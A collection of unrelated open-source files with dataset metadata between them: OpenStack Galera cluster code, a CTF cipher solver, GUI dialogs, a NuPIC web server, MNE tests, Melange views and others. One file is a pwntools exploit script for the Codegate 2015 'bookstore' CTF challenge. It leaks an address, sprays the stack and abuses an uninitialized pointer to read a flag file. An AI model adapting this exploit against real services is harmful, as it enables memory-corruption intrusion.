for instance in instances:
if not instance.get("name"):
instance['name'] = "%s-member-%s" % (db_info.name,
str(name_index))
name_index += 1
return [Instance.create(context,
instance['name'],
instance['flavor_id'],
datastore_version.image_id,
[], [],
datastore, datastore_version,
instance.get('volume_size', None),
None,
availability_zone=instance.get(
'availability_zone', None),
nics=instance.get('nics', None),
configuration_id=configuration_id,
cluster_config=member_config,
volume_type=instance.get(
'volume_type', None),
modules=instance.get('modules'),
locality=locality,
region_name=instance.get('region_name')
)
for instance in instances]
@classmethod
def create(cls, context, name, datastore, datastore_version,
instances, extended_properties, locality, configuration):
LOG.debug("Initiating Galera cluster creation.")
ds_conf = CONF.get(datastore_version.manager)
# Check number of instances is at least min_cluster_member_count
if len(instances) < ds_conf.min_cluster_member_count:
raise exception.ClusterNumInstancesNotLargeEnough(
num_instances=ds_conf.min_cluster_member_count)
cls._validate_cluster_instances(context, instances, datastore,
datastore_version)
# Updating Cluster Task
db_info = cluster_models.DBCluster.create(
name=name, tenant_id=context.project_id,
datastore_version_id=datastore_version.id,
task_status=ClusterTasks.BUILDING_INITIAL,
configuration_id=configuration)
cls._create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration)
# Calling taskmanager to further proceed for cluster-configuration
task_api.load(context, datastore_version.manager).create_cluster(
db_info.id)
return cls(context, db_info, datastore, datastore_version)
def grow(self, instances):
LOG.debug("Growing cluster %s.", self.id)
self.validate_cluster_available()
context = self.context
db_info = self.db_info
datastore = self.ds
datastore_version = self.ds_version
self._validate_cluster_instances(context, instances, datastore,
datastore_version)
db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
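        # if instance creation or the taskmanager call fails, reset the task
        # status so the cluster is not left stuck in GROWING_CLUSTER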
try:
locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
configuration_id = self.db_info.configuration_id
new_instances = self._create_instances(
context, db_info, datastore, datastore_version, instances,
None, locality, configuration_id)
task_api.load(context, datastore_version.manager).grow_cluster(
db_info.id, [instance.id for instance in new_instances])
except Exception:
db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(context, db_info,
datastore, datastore_version)
def shrink(self, instances):
"""Removes instances from a cluster."""
LOG.debug("Shrinking cluster %s.", self.id)
self.validate_cluster_available()
removal_instances = [Instance.load(self.context, inst_id)
for inst_id in instances]
db_instances = DBInstance.find_all(
cluster_id=self.db_info.id, deleted=False).all()
if len(db_instances) - len(removal_instances) < 1:
raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
try:
task_api.load(self.context, self.ds_version.manager
).shrink_cluster(self.db_info.id,
[instance.id
for instance in removal_instances])
except Exception:
self.db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(self.context, self.db_info,
self.ds, self.ds_version)
def restart(self):
self.rolling_restart()
def upgrade(self, datastore_version):
self.rolling_upgrade(datastore_version)
def configuration_attach(self, configuration_id):
self.rolling_configuration_update(configuration_id)
def configuration_detach(self):
self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
class GaleraCommonMgmtClusterView(MgmtClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
|
apache-2.0
| 6,938,992,577,265,040,000
| 38.37788
| 79
| 0.604447
| false
| 4.589151
| true
| false
| false
|
chenyoufu/writeups
|
jarvisoj/basic_cake.py
|
1
|
1448
|
s = '''
nit yqmg mqrqn bxw mtjtm nq rqni fiklvbxu mqrqnl xwg dvmnzxu lqjnyxmt xatwnl, rzn nit uxnntm xmt zlzxuuk mtjtmmtg nq xl rqnl. nitmt vl wq bqwltwlzl qw yivbi exbivwtl pzxuvjk xl mqrqnl rzn nitmt vl atwtmxu xamttetwn xeqwa tsftmnl, xwg nit fzruvb, nixn mqrqnl ntwg nq gq lqet qm xuu qj nit jquuqyvwa: xbbtfn tutbnmqwvb fmqamxeevwa, fmqbtll gxnx qm fiklvbxu ftmbtfnvqwl tutbnmqwvbxuuk, qftmxnt xznqwqeqzluk nq lqet gtamtt, eqdt xmqzwg, qftmxnt fiklvbxu fxmnl qj vnltuj qm fiklvbxu fmqbtlltl, ltwlt xwg exwvfzuxnt nitvm twdvmqwetwn, xwg tsivrvn vwntuuvatwn rtixdvqm - tlftbvxuuk rtixdvqm yivbi evevbl izexwl qm qnitm xwvexul. juxa vl lzrlnvnzntfxllvldtmktxlkkqzaqnvn. buqltuk mtuxntg nq nit bqwbtfn qj x mqrqn vl nit jvtug qj lkwnitnvb rvquqak, yivbi lnzgvtl twnvnvtl yiqlt wxnzmt vl eqmt bqefxmxrut nq rtvwal nixw nq exbivwtl.
'''
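# Classic monoalphabetic substitution: the two prints below list the 1- and
# 2-letter words of the ciphertext, which seed guesses like 'x' -> 'a' and
# 'nq' -> 'to' for the mapping m.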
print [x for x in s.split(' ') if len(x) == 1]
print [x for x in s.split(' ') if len(x) == 2]
m = {
'a': 'g',
'b': 'c',
'd': 'v',
'e': 'm',
'f': 'p',
'x': 'a',
'r': 'b',
's': 'x',
'z': 'u',
'g': 'd',
'y': 'w',
'j': 'f',
'u': 'l',
'k': 'y',
'w': 'n',
'q': 'o',
'v': 'i',
'l': 's',
'n': 't',
'i': 'h',
't': 'e',
'm': 'r'
}
ss = ''
for x in s:
    if x in m:
ss += m[x]
else:
ss += x
print ss
flag = 'lzrlnvnzntfxllvldtmktxlkkqzaqnvn'
for f in flag:
    if f not in m:
print f
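# Applying the same mapping to the flag string above decodes it to:
#   substitutepassisveryeasyyougotit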
|
gpl-3.0
| -6,093,663,068,113,639,000
| 29.166667
| 823
| 0.608425
| false
| 1.964722
| false
| false
| false
|
swprojects/Serial-Sequence-Creator
|
dialogs/setvoltage.py
|
1
|
5066
|
"""
Description:
Requirements: pySerial, wxPython Phoenix
glossary of abbreviations and other descriptions:
DMM - digital multimeter
PSU - power supply
SBC - single board computer
INS - general instrument commands
GEN - general sequence instructions
"""
import logging
import sys
import time
import wx
import theme
import base
class SetVoltage(wx.Dialog):
def __init__(self, parent, instruments):
wx.Dialog.__init__(self,
parent,
title="Set Voltage")
panel = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer(wx.HORIZONTAL)
sbox = wx.StaticBox(panel, label="")
sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)
grid = wx.GridBagSizer(5,5)
row = 0
# row += 1 #let's start at 1, to give some space
lbl_psu = wx.StaticText(panel, label="Power Supply:")
choices = ["Choose on execution"]
choices.extend(instruments)
self.cbox_psu = wx.ComboBox(panel, choices=choices)
# self.cbox_psu.Bind(wx.EVT_COMBOBOX, self.OnPsuSelected)
grid.Add(lbl_psu, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.cbox_psu, pos=(row,1), span=(0,3), flag=wx.ALL|wx.EXPAND, border=5)
grid.AddGrowableCol(1)
row += 1
text_voltage = wx.StaticText(panel, label="Set Voltage:")
self.spin_voltage = wx.SpinCtrl(panel, max=30, min=0, size=(50, -1))
self.spin_voltage2 = wx.SpinCtrl(panel, max=99, min=0, size=(50, -1))
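        # two spinners: whole volts (0-30) and the fractional part (0-99)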
self.spin_voltage.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.spin_voltage2.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.lbl_voltage = wx.StaticText(panel, label="0.0v")
grid.Add(text_voltage, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.spin_voltage, pos=(row,1), flag=wx.ALL, border=5)
grid.Add(self.spin_voltage2, pos=(row,2), flag=wx.ALL, border=5)
grid.Add(self.lbl_voltage, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=5)
sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)
sbox_sizer.AddSpacer(10)
#-----
hsizer = wx.BoxSizer(wx.HORIZONTAL)
hsizer.AddStretchSpacer()
btn_cancel = wx.Button(panel, label="Cancel", id=wx.ID_CANCEL)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)
self.btn_add = wx.Button(panel, label="Add", id=wx.ID_OK)
self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)
hsizer.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)
hsizer.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)
#add to main sizer
sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)
sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)
panel.SetSizer(sizer)
w, h = sizer.Fit(self)
# self.SetSize((w, h*1.5))
# self.SetMinSize((w, h*1.5))
# self.SetMaxSize(sizer.Fit(self))
        try:
            self.SetIcon(theme.GetIcon("psu_png"))
        except Exception:
            pass
self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
def OnKeyUp(self, event):
key = event.GetKeyCode()
print(event)
        if key == wx.WXK_ESCAPE:
self.EndModal(wx.ID_CANCEL)
def OnSpinVoltage(self, event=None):
v0 = self.spin_voltage.GetValue()
v1 = self.spin_voltage2.GetValue()
label = str(v0) + "." + str(v1) + "v"
self.lbl_voltage.SetLabel(label)
def OnButton(self, event):
e = event.GetEventObject()
label = e.GetLabel()
        btn_id = e.GetId()
        if label in ("Cancel", "Add"):
            self.EndModal(btn_id)
def SetValue(self, data):
params = data["parameters"]
params = "), " + params[1:-1] + ", (" #so we can split it easier
param_dict = {}
params = params.split("), (")
for param in params:
param = param[1: -1]
if param == "":
continue
key, value = param.split("', '")
param_dict[key] = value
self.cbox_psu.SetValue(param_dict["psu"])
self.lbl_voltage.SetLabel(param_dict["v0"])
spin1, spin2 = param_dict["v0"][:-1].split(".")
self.spin_voltage.SetValue(spin1)
self.spin_voltage2.SetValue(spin2)
def GetValue(self):
psu = self.cbox_psu.GetValue()
if psu != "":
for char in psu:
if char.isdigit() or char.isalpha():
continue
psu = psu.replace(char, "_")
data = [("psu", psu),
("v0", self.lbl_voltage.GetLabel())]
data = {"action":"Set Voltage",
"parameters":str(data),}
return data
|
mit
| -3,217,298,695,919,984,600
| 30.867925
| 89
| 0.530004
| false
| 3.453306
| false
| false
| false
|
NunoEdgarGub1/nupic
|
nupic/simple_server.py
|
1
|
3599
|
#! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
A simple web server for interacting with NuPIC.
Note: Requires web.py to run (install using '$ pip install web.py')
"""
import os
import sys
# The following loop removes the nupic.nupic package from the
# PythonPath (sys.path). This is necessary in order to let web
# import the built in math module rather than defaulting to
# nupic.math
while True:
try:
sys.path.remove(os.path.dirname(os.path.realpath(__file__)))
  except ValueError:
break
import datetime
import json
import web
from nupic.frameworks.opf.modelfactory import ModelFactory
g_models = {}
urls = (
# Web UI
"/models", "ModelHandler",
r"/models/([-\w]*)", "ModelHandler",
r"/models/([-\w]*)/run", "ModelRunner",
)
class ModelHandler(object):
def GET(self):
"""
/models
returns:
[model1, model2, model3, ...] list of model names
"""
global g_models
return json.dumps({"models": g_models.keys()})
def POST(self, name):
"""
/models/{name}
schema:
{
"modelParams": dict containing model parameters
"predictedFieldName": str
}
returns:
{"success":name}
"""
global g_models
data = json.loads(web.data())
modelParams = data["modelParams"]
predictedFieldName = data["predictedFieldName"]
if name in g_models.keys():
raise web.badrequest("Model with name <%s> already exists" % name)
model = ModelFactory.create(modelParams)
model.enableInference({'predictedField': predictedFieldName})
g_models[name] = model
return json.dumps({"success": name})
class ModelRunner(object):
def POST(self, name):
"""
/models/{name}/run
schema:
{
predictedFieldName: value
timestamp: %m/%d/%y %H:%M
}
NOTE: predictedFieldName MUST be the same name specified when
creating the model.
returns:
{
"predictionNumber":<number of record>,
"anomalyScore":anomalyScore
}
"""
global g_models
data = json.loads(web.data())
data["timestamp"] = datetime.datetime.strptime(
data["timestamp"], "%m/%d/%y %H:%M")
if name not in g_models.keys():
raise web.notfound("Model with name <%s> does not exist." % name)
modelResult = g_models[name].run(data)
predictionNumber = modelResult.predictionNumber
anomalyScore = modelResult.inferences["anomalyScore"]
return json.dumps({"predictionNumber": predictionNumber,
"anomalyScore": anomalyScore})
web.config.debug = False
app = web.application(urls, globals())
if __name__ == "__main__":
app.run()
|
gpl-3.0
| 307,131,252,297,311,600
| 23.82069
| 72
| 0.639066
| false
| 4.012263
| false
| false
| false
|
ARudiuk/mne-python
|
mne/io/array/tests/test_array.py
|
3
|
3552
|
from __future__ import print_function
# Author: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import matplotlib
from numpy.testing import assert_array_almost_equal, assert_allclose
from nose.tools import assert_equal, assert_raises, assert_true
from mne import find_events, Epochs, pick_types
from mne.io import Raw
from mne.io.array import RawArray
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.meas_info import create_info, _kind_dict
from mne.utils import slow_test, requires_version, run_tests_if_main
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests might throw warnings
base_dir = op.join(op.dirname(__file__), '..', '..', 'tests', 'data')
fif_fname = op.join(base_dir, 'test_raw.fif')
@slow_test
@requires_version('scipy', '0.12')
def test_array_raw():
"""Test creating raw from array
"""
import matplotlib.pyplot as plt
# creating
raw = Raw(fif_fname).crop(2, 5, copy=False)
data, times = raw[:, :]
sfreq = raw.info['sfreq']
ch_names = [(ch[4:] if 'STI' not in ch else ch)
for ch in raw.info['ch_names']] # change them, why not
# del raw
types = list()
for ci in range(102):
types.extend(('grad', 'grad', 'mag'))
types.extend(['stim'] * 9)
types.extend(['eeg'] * 60)
# wrong length
assert_raises(ValueError, create_info, ch_names, sfreq, types)
# bad entry
types.append('foo')
assert_raises(KeyError, create_info, ch_names, sfreq, types)
types[-1] = 'eog'
# default type
info = create_info(ch_names, sfreq)
assert_equal(info['chs'][0]['kind'], _kind_dict['misc'][0])
# use real types
info = create_info(ch_names, sfreq, types)
raw2 = _test_raw_reader(RawArray, test_preloading=False,
data=data, info=info, first_samp=2 * data.shape[1])
data2, times2 = raw2[:, :]
assert_allclose(data, data2)
assert_allclose(times, times2)
assert_true('RawArray' in repr(raw2))
assert_raises(TypeError, RawArray, info, data)
# filtering
picks = pick_types(raw2.info, misc=True, exclude='bads')[:4]
assert_equal(len(picks), 4)
raw_lp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_lp.filter(0., 4.0 - 0.25, picks=picks, n_jobs=2)
raw_hp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_hp.filter(8.0 + 0.25, None, picks=picks, n_jobs=2)
raw_bp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bp.filter(4.0 + 0.25, 8.0 - 0.25, picks=picks)
raw_bs = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bs.filter(8.0 + 0.25, 4.0 - 0.25, picks=picks, n_jobs=2)
data, _ = raw2[picks, :]
lp_data, _ = raw_lp[picks, :]
hp_data, _ = raw_hp[picks, :]
bp_data, _ = raw_bp[picks, :]
bs_data, _ = raw_bs[picks, :]
sig_dec = 11
assert_array_almost_equal(data, lp_data + bp_data + hp_data, sig_dec)
assert_array_almost_equal(data, bp_data + bs_data, sig_dec)
# plotting
raw2.plot()
raw2.plot_psd()
plt.close('all')
# epoching
events = find_events(raw2, stim_channel='STI 014')
events[:, 2] = 1
assert_true(len(events) > 2)
epochs = Epochs(raw2, events, 1, -0.2, 0.4, preload=True)
epochs.plot_drop_log()
epochs.plot()
evoked = epochs.average()
evoked.plot()
assert_equal(evoked.nave, len(events) - 1)
plt.close('all')
run_tests_if_main()
|
bsd-3-clause
| -862,542,634,687,912,300
| 32.509434
| 79
| 0.630349
| false
| 2.977368
| true
| false
| false
|
Qwaz/solved-hacking-problem
|
Codegate/2015 Quals/bookstore/bookstore.py
|
1
|
1395
|
from pwn import *
def talk(send, until, no_newline=False):
    if until:
        resp = r.recvuntil(until)
    else:
        resp = r.recv()
    print resp + send
    if no_newline:
        r.send(send)
    else:
        r.sendline(send)
r = remote('localhost', 8020)
# Login
talk('helloadmin', 'ID : ')
talk('iulover!@#$%', 'PASSWORD : ')
# Add Book
talk('1', '> ')
talk('book', '\n')
talk('desc', '\n')
talk('0', '\n')
# Modify Price and Stock
talk('2', '> ')
talk('0', 'No : ')
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('aaaa'*100, '\n')
talk('xxxx'*100, 'description\n')
talk('0', 'menu!\n')
# Get Offset
talk('4', '> ')
offset_before = r.recvuntil('a'*20)
offset_str = r.recvuntil('> ')
offset = u32(offset_str[8:12])
log.success("%x" % offset)
offset = offset - 0x9AD + 0x8DB
log.success("%x" % offset)
print offset_before + offset_str
# Fill Stack
r.sendline('2')
talk('0', 'No : ')
talk('2', 'menu!\n')
talk(p32(offset)*750, '\n')
# Uninitialized Shipping Pointer
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('./flag', '\n', no_newline=True)
talk('desc', 'description\n')
# Modify Freeshipping
talk('4', 'menu!\n')
talk('1', '\n')
talk('0', 'menu!\n')
# Call ViewBook
talk('3', '> ')
talk('0', 'No : ')
# Close Program
talk('0', '> ')
|
gpl-2.0
| -2,153,698,298,135,402,800
| 16.658228
| 40
| 0.564158
| false
| 2.434555
| false
| false
| false
|
SRabbelier/Melange
|
app/soc/views/models/notification.py
|
1
|
9142
|
#!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the view code for Notifications.
"""
__authors__ = [
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
import time
from google.appengine.ext import db
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models.notification import logic as notification_logic
from soc.logic.models.site import logic as site_logic
from soc.logic.models.user import logic as user_logic
from soc.models import notification as notification_model
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import lists as list_helper
from soc.views.helper import redirects
from soc.views.models import base
class CreateForm(helper.forms.BaseForm):
"""Form for creating a Notification.
"""
# to user field
to_user = forms.fields.CharField(label='To User')
def __init__(self, *args, **kwargs):
""" Calls super and then redefines the order in which the fields appear.
for parameters see BaseForm.__init__()
"""
super(CreateForm, self).__init__(*args, **kwargs)
# set form fields order
self.fields.keyOrder = ['to_user', 'subject', 'message']
class Meta:
"""Inner Meta class that defines some behavior for the form.
"""
model = notification_model.Notification
fields = None
# exclude the necessary fields from the form
exclude = ['link_id', 'scope', 'scope_path', 'from_user', 'unread']
clean_to_user = cleaning.clean_existing_user('to_user')
class View(base.View):
"""View methods for the Notification model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['edit'] = ['deny']
rights['show'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['delete'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['list'] = ['checkIsUser']
# create is developer only for the time being to test functionality
rights['create'] = ['checkIsDeveloper']
new_params = {}
new_params['logic'] = notification_logic
new_params['rights'] = rights
new_params['name'] = "Notification"
new_params['no_create_with_key_fields'] = True
new_params['create_form'] = CreateForm
new_params['edit_redirect'] = '/%(url_name)s/list'
new_params['public_configuration'] = {"multiselect": True}
new_params['public_field_prefetch'] = ['from_user']
new_params['public_field_extra'] = lambda entity: {
"from": entity.from_user.name if entity.from_user else
site_logic.getSingleton().site_name,
"unread": "Not Read" if entity.unread else "Read",
}
new_params['public_field_props'] = {
"unread": {
"stype": "select",
"editoptions": {"value": ":All;^Read$:Read;^Not Read$:Not Read"}
}
}
new_params['public_conf_extra'] = {
"multiselect": True,
}
new_params['public_field_keys'] = ["unread", "from", "subject",
"created_on",]
new_params['public_field_names'] = ["Unread", "From", "Subject",
"Received on"]
new_params['public_button_global'] = [
{
'bounds': [1,'all'],
'id': 'mark_read',
'caption': 'Mark as Read',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'mark_unread',
'caption': 'Mark as Unread',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'delete',
'caption': 'Delete Notification',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
}]
params = dicts.merge(params, new_params)
params['public_row_extra'] = lambda entity: {
"link": redirects.getPublicRedirect(entity, params)
}
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def list(self, request, access_type, page_name=None, params=None,
filter=None, order=None, **kwargs):
"""Lists all notifications that the current logged in user has stored.
for parameters see base.list()
"""
if request.method == 'POST':
return self.listPost(request, params, **kwargs)
else: # request.method == 'GET'
if not order:
order = ['-created_on']
user_entity = user_logic.getCurrentUser()
filter = {'scope': user_entity}
return super(View, self).list(request, access_type, page_name=page_name,
params=params, filter=filter, order=order,
**kwargs)
def listPost(self, request, params, **kwargs):
"""Handles the POST request for the list of notifications.
"""
import logging
from django.utils import simplejson
post_dict = request.POST
data = simplejson.loads(post_dict.get('data', '[]'))
button_id = post_dict.get('button_id', '')
user_entity = user_logic.getCurrentUser()
notifications = []
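    # resolve each selected row key to an entity, keeping only notifications
    # owned by the current user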
for selection in data:
notification = notification_logic.getFromKeyName(selection['key'])
if not notification:
        logging.error('No notification found for %(key)s' % selection)
continue
if notification.scope.key() == user_entity.key():
notifications.append(notification)
if button_id == 'delete':
for notification in notifications:
notification_logic.delete(notification)
elif button_id == 'mark_read' or button_id == 'mark_unread':
if button_id == 'mark_read':
# mark all the Notifications selected as read
fields = {'unread': False}
elif button_id == 'mark_unread':
# mark all the Notifications selected as unread
fields = {'unread': True}
for notification in notifications:
notification_logic.updateEntityProperties(notification, fields,
store=False)
db.put(notifications)
# return a 200 response to signal that all is okay
return http.HttpResponseRedirect('')
def _editPost(self, request, entity, fields):
"""See base.View._editPost().
"""
# get the current user
current_user = user_logic.getCurrentUser()
fields['link_id'] = 't%i' % (int(time.time()*100))
fields['scope'] = fields['to_user']
fields['from_user'] = current_user
fields['scope_path'] = fields['to_user'].link_id
def _editSeed(self, request, seed):
"""Checks if scope_path is seeded and puts it into to_user.
for parameters see base._editSeed()
"""
# if scope_path is present
if 'scope_path' in seed.keys():
# fill the to_user field with the scope path
seed['to_user'] = seed['scope_path']
def _public(self, request, entity, context):
"""Marks the Notification as read if that hasn't happened yet.
for parameters see base._public()
"""
# if the user viewing is the user for which this notification is meant
# and the notification has not been read yet
if entity.unread:
# get the current user
user = user_logic.getCurrentUser()
# if the message is meant for the user that is reading it
# pylint: disable=E1103
if entity.scope.key() == user.key():
# mark the entity as read
self._logic.updateEntityProperties(entity, {'unread' : False} )
context['entity_type_url'] = self._params['url_name']
context['entity_suffix'] = entity.key().id_or_name() if entity else None
context['page_name'] = 'Notification - %s' % (entity.subject)
return True
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
apache-2.0
| -9,177,998,094,437,962,000
| 30.415808
| 80
| 0.618355
| false
| 3.955863
| false
| false
| false
|
vaizguy/cryptikchaos
|
src/cryptikchaos/core/gui/service.py
|
1
|
5439
|
'''
Created on Oct 8, 2013
This file is part of CryptikChaos.
CryptikChaos is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CryptikChaos is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CryptikChaos. If not, see <http://www.gnu.org/licenses/>.
@author: vaizguy
'''
__author__ = "Arun Vaidya"
__version__ = "0.6.1"
from kivy.app import App
from kivy.resources import resource_add_path
from kivy.logger import Logger
from kivy.core.window import Window
from kivy.clock import Clock
from cryptikchaos.core.env.configuration import constants
try:
from cryptikchaos.libs.garden.navigationdrawer \
import NavigationDrawer
except ImportError:
from kivy.garden.navigationdrawer import NavigationDrawer
from cryptikchaos.core.gui.mainpanel import MainPanel
from cryptikchaos.core.gui.sidepanel import SidePanel
# Add kivy resource paths
resource_add_path(constants.KIVY_RESOURCE_PATH_1)
resource_add_path(constants.KIVY_RESOURCE_PATH_2)
class GUIService(App):
"Graphical user interface service."
# Init attributes
core_services = None
def __init__(self, handleinput_cmd_hook, getcommands_cmd_hook, **kwargs):
# Init App
super(GUIService, self).__init__(**kwargs)
# Disable default kivy settings
self.use_kivy_settings = False
# Main drawer
self.drawer = NavigationDrawer()
# Set up Main panel
self.main_panel = MainPanel(
# drawer obj
drawer=self.drawer,
# Console splash greeting
greeting=constants.GUI_WELCOME_MSG,
)
# Set up Side pane
self.side_panel = SidePanel(
# drawer obj
drawer=self.drawer,
# screen manager obj
main_panel=self.main_panel
)
        # Append text to console hook
self.inputtext_gui_hook = self.main_panel.inputtext_gui_hook
# Get App GUI Width
self.getmaxwidth_gui_hook = self.main_panel.getmaxwidth_gui_hook
# Clear display hook
self.cleardisplay_gui_hook = self.main_panel.cleardisplay_gui_hook
# Update progress bar
self.cmdprog_gui_hook = self.main_panel.cmdprog_gui_hook
# Register CMD hooks
self.main_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
self.main_panel.register_getcommands_cmd_hook(
getcommands_cmd_hook)
self.side_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
def build(self):
"Build the kivy App."
# Set title
self.title = "CryptikChaos"
# Add main and side pane
self.drawer.add_widget(self.side_panel)
self.drawer.add_widget(self.main_panel)
# Set animation type
self.drawer.anim_type = 'slide_above_anim'
# Bind Keyboard hook
self.bind(on_start=self.post_build_init)
return self.drawer
def on_start(self):
'''Event handler for the on_start event, which is fired after
initialization (after build() has been called), and before the
application is being run.
'''
Logger.debug("GUI: Cryptikchaos Client started.")
        # Print cryptikchaos banner
Clock.schedule_once(self.print_logo, 1)
def on_stop(self):
'''Event handler for the on_stop event, which is fired when the
application has finished running (e.g. the window is about to be
closed).
'''
Logger.debug("GUI: Stopped Cryptikchaos Client.")
def on_pause(self):
return True
def on_resume(self):
pass
def print_logo(self, *args):
"Print the criptikchaos logo."
if constants.GUI_LOGO:
# Print logo through log
Logger.info('GUI: \n{}'.format(constants.GUI_LOGO))
return args
def post_build_init(self, *args):
if constants.PLATFORM_ANDROID:
import android
android.map_key(android.KEYCODE_BACK, 1001)
win = Window
win.bind(on_keyboard=self.my_key_handler)
def toggle_drawer_state(self):
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
else:
self.drawer.anim_to_state("open")
def my_key_handler(self, window, keycode1, keycode2, text, modifiers):
#Logger.debug("H/W Keypress: {}".format(keycode1))
if keycode1 in [27, 1001]:
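            # 27 is ESC on desktop; 1001 is the Android BACK key remapped in
            # post_build_init above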
# Go to console screen or close app
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
elif self.main_panel.is_console_focused():
self.stop()
else:
self.main_panel.goto_console_screen()
return True
elif keycode1 == 319:
# Open navbar with menu key
self.toggle_drawer_state()
return True
else:
return False
|
gpl-3.0
| 6,267,618,879,123,569,000
| 28.085561
| 77
| 0.627689
| false
| 3.806158
| false
| false
| false
|
silenius/amnesia
|
amnesia/modules/folder/orders.py
|
1
|
1754
|
# -*- coding: utf-8 -*-
from amnesia.modules.content import Content
from amnesia.modules.content_type import ContentType
from amnesia.modules.event import Event
from amnesia.modules.account import Account
#from amnesia.modules.country import Country
from amnesia.order import EntityOrder
from amnesia.order import Path
def includeme(config):
config.include('amnesia.modules.content.mapper')
config.include('amnesia.modules.account.mapper')
config.include('amnesia.modules.event.mapper')
config.registry.settings['amnesia:orders'] = {
'title': EntityOrder(Content, 'title', 'asc', doc='title'),
'weight': EntityOrder(Content, 'weight', 'desc', doc='default'),
'update': EntityOrder(
Content, 'last_update', 'desc', doc='last update'
),
'added': EntityOrder(Content, 'added', 'desc', doc='added date'),
'type': EntityOrder(
ContentType, 'name', 'asc', path=[Path(Content, 'type')],
doc='content type'
),
'owner': EntityOrder(Account, 'login', 'asc', path=[Path(Content,
'owner')],
doc='owner'),
'starts': EntityOrder(Event, 'starts', 'desc', doc='event starts'),
'ends': EntityOrder(Event, 'ends', 'desc', doc='event ends'),
# 'country' : EntityOrder(Country, 'name', 'asc', path=[Path(Event,
# 'country')],
# doc='event country'),
# 'major' : EntityOrder(MimeMajor, 'name', 'asc',
# path=[Path(File, 'mime'), Path(Mime, 'major')],
# doc='mime')
}
